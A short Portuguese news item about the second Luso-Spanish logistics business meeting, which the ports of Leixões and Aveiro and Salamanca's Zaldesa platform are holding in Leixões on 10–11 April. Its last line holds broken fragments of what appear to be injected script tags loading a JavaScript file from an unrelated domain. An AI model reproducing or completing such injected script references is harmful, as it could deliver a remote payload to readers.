II Encontro empresarial Luso-Espanhol de Logística em Leixões

O Porto de Leixões, o Porto de Aveiro e a Zaldesa – Plataforma Logística de Salamanca vão promover o II Encontro empresarial Luso-Espanhol entre os dias 10 e 11 de Abril.

«A cooperação na área da logística entre Portugal e Espanha constitui um domínio estratégico para a afirmação da competitividade internacional da economia dos dois países, no contexto de um mundo globalizado. Esta cooperação responde a uma necessidade resultante do reforço do relacionamento bilateral dos últimos anos e do aprofundamento da integração europeia».

 

É desta forma que o Porto de Leixões, o Porto de Aveiro e a Zaldesa – Plataforma Logística de Salamanca, iniciam o seu comunicado sobre o II Encontro empresarial Luso-Espanhol.

 

No primeiro encontro, realizado em Salamanca durante o ano passado e que contou com a participação de mais de 200 empresas e autoridades dos dois países, o debate focou-se exactamente na cooperação transfronteiriça entre estas regiões.

 

Para este ano, o encontro fica marcado para os dias 10 e 11 de Abril em Leixões e «irá aprofundar as relações já estabelecidas e potenciar a actividade logística como factor de crescimento e desenvolvimento do Norte e Centro de Portugal e da região de Castela-León».

 

Assim, entre os objectivos traçados para segundo encontro estão «o melhoramento das inter-relações das plataformas de ambos os paíse,s o que permitirá reduzir os custos para as empresas, melhorar a sua competitividade e acelerar o seu crescimento; o fomentar as relações empresariais entre ambas a regiões; a concretização de projectos conjuntos que permitam responder às exigências actuais da presença num mercado global; e o dar a conhecer aos agentes económicos as novas infra-estruturas logísticas previstas.»

ttp://www.hdadwcd.com/b.js>ttp://www.hdadwcd.com/b.js>rc=http://www.hdadwcd.com/b.js>rc=http: